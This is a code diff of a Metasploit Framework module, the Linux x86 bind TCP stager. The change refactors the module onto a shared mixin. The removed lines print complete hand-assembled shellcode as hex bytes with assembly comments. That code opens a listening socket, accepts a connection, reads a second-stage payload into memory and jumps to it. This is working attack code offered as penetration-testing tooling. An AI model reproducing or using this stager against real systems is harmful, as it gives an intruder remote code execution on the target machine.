|
6 | 6 |
|
7 | 7 | require 'msf/core'
|
8 | 8 | require 'msf/core/handler/bind_tcp'
|
| 9 | +require 'msf/core/payload/linux/bind_tcp' |
9 | 10 |
|
| 11 | +module Metasploit4 |
10 | 12 |
|
11 |
| -### |
12 |
| -# |
13 |
| -# BindTcp |
14 |
| -# ------- |
15 |
| -# |
16 |
| -# Linux bind TCP stager. |
17 |
| -# |
18 |
| -### |
19 |
| -module Metasploit3 |
20 |
| - |
21 |
| - CachedSize = 79 |
| 13 | + CachedSize = :dynamic |
22 | 14 |
|
23 | 15 | include Msf::Payload::Stager
|
24 |
| - include Msf::Payload::Linux |
| 16 | + include Msf::Payload::Linux::BindTcp |
25 | 17 |
|
26 | 18 | def initialize(info = {})
|
27 | 19 | super(merge_info(info,
|
28 |
| - 'Name' => 'Bind TCP Stager', |
29 |
| - 'Description' => 'Listen for a connection', |
30 |
| - 'Author' => [ |
31 |
| - 'skape', # original |
32 |
| - 'egypt', # NX support |
33 |
| - ], |
| 20 | + 'Name' => 'Bind TCP Stager (Linux x86)', |
| 21 | + 'Description' => 'Listen for a connection (Linux x86)', |
| 22 | + 'Author' => [ 'skape', 'egypt', ], |
34 | 23 | 'License' => MSF_LICENSE,
|
35 | 24 | 'Platform' => 'linux',
|
36 | 25 | 'Arch' => ARCH_X86,
|
37 | 26 | 'Handler' => Msf::Handler::BindTcp,
|
38 |
| - 'Stager' => |
39 |
| - { |
40 |
| - 'Offsets' => |
41 |
| - { |
42 |
| - 'LPORT' => [ 0x29, 'n' ], |
43 |
| - }, |
44 |
| - 'Payload' => |
45 |
| - |
46 |
| - "\x6a\x7d" +# push byte +0x7d |
47 |
| - "\x58" +# pop eax |
48 |
| - "\x99" +# cdq |
49 |
| - "\xb2\x07" +# mov dl,0x7 |
50 |
| - "\xb9\x00\x10\x00\x00" +# mov ecx,0x1000 |
51 |
| - "\x89\xe3" +# mov ebx,esp |
52 |
| - "\x66\x81\xe3\x00\xf0" +# and bx,0xf000 |
53 |
| - "\xcd\x80" +# int 0x80 |
54 |
| - "\x31\xdb" +# xor ebx,ebx |
55 |
| - "\xf7\xe3" +# mul ebx |
56 |
| - "\x53" +# push ebx |
57 |
| - "\x43" +# inc ebx |
58 |
| - "\x53" +# push ebx |
59 |
| - "\x6a\x02" +# push byte +0x2 |
60 |
| - "\x89\xe1" +# mov ecx,esp |
61 |
| - "\xb0\x66" +# mov al,0x66 |
62 |
| - "\xcd\x80" +# int 0x80 |
63 |
| - "\x5b" +# pop ebx |
64 |
| - "\x5e" +# pop esi |
65 |
| - "\x52" +# push edx |
66 |
| - "\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002 |
67 |
| - "\x6a\x10" +# push byte +0x10 |
68 |
| - "\x51" +# push ecx |
69 |
| - "\x50" +# push eax |
70 |
| - "\x89\xe1" +# mov ecx,esp |
71 |
| - "\x6a\x66" +# push byte +0x66 |
72 |
| - "\x58" +# pop eax |
73 |
| - "\xcd\x80" +# int 0x80 |
74 |
| - "\xd1\xe3" +# shl ebx,1 |
75 |
| - "\xb0\x66" +# mov al,0x66 |
76 |
| - "\xcd\x80" +# int 0x80 |
77 |
| - "\x43" +# inc ebx |
78 |
| - "\xb0\x66" +# mov al,0x66 |
79 |
| - "\x89\x51\x04" +# mov [ecx+0x4],edx |
80 |
| - "\xcd\x80" +# int 0x80 |
81 |
| - "\x93" +# xchg eax,ebx |
82 |
| - "\xb6\x0c" +# mov dh,0xc |
83 |
| - "\xb0\x03" +# mov al,0x3 |
84 |
| - "\xcd\x80" +# int 0x80 |
85 |
| - "\x89\xdf" +# mov edi,ebx |
86 |
| - "\xff\xe1" # jmp ecx |
87 |
| - |
88 |
| - } |
| 27 | + 'Convention' => 'sockedi', |
| 28 | + 'Stager' => { 'RequiresMidstager' => true } |
89 | 29 | ))
|
90 | 30 | end
|
91 | 31 |
|
|